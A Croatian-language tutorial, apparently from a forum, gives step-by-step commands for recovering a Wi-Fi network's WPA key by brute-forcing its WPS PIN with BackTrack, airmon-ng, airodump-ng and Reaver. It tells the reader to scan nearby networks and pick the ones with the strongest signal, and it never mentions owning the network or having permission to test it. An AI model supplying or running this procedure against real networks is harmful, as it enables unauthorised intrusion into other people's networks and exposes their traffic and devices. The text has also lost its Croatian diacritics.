Potrebne stvari:

Linux distribucija, ja sam koristio Live CD (instalacija nije potrebna, samo stavite DVD i resetirajte
raunalo) od BackTrack-a jer ima u sebi sve programe potrebne za probijanje (airomon-ng, airodump-
ng ...)
Reaver (code.google.com/p/reaver-wps/downloads/list) - mislim da ga ima na BackTrack v5, na v4 ga
treba instalirat

Koraci (naredbe za konzolu):

Za poetak instalirajte reaver

Za debian/ubuntu verzije:
Kod:

apt-get install reaver

ukoliko apt-get ne prolazi:

Kod:

wget https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar xzvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install

Postupak exploitanja:

potrebno je pronai ime WiFi kartice, u veini sluaja je wlan0 ali ako ih imate vie onda se mogu zvati
drugaije

Kod:

iwconfig

Stavi WiFi karticu u monitor mode

Kod:

airmon-ng start wlan0

Prikai sve mree u okolici (potrebno nam je za prikaz BSSID-a i sl.):

Kod:

airodump-ng mon0

(ako ne prolazi zamijeni mon0 sa wlan0)

Iz gornje slike su vam nevedeni svi vidljivi uredjaji u blizini, jako je bitno kod ove metode ja Vam je jak
signal, stoga krenite na one koji imaju cim manji PWR. Ugasite airodump-ng sa ctrl+c i kopirajte BSSID.

Sada slijedi probijanje:

Kod:

reaver -i mon0 -b 3T:GE:5J:25:6F:B9 -vv

3T:GE:5J:25:6F:B9 - je BSSID ureaja

mon0 - je oznaka WiFi-a u monitor mode-u (ako ne radi, probajte wlan0)

Ovaj postupak traje relativno dugo, u mom slucaju trebalo mu je oko 2:20h, zna se oduziti i do 10h. Ako
je sve proslo uredu ispisat ce se WPA klju:
Vrijeme trajanja probijanja ne ovisi o JAINI WPA kljua, ve o PIN-u od WPS-a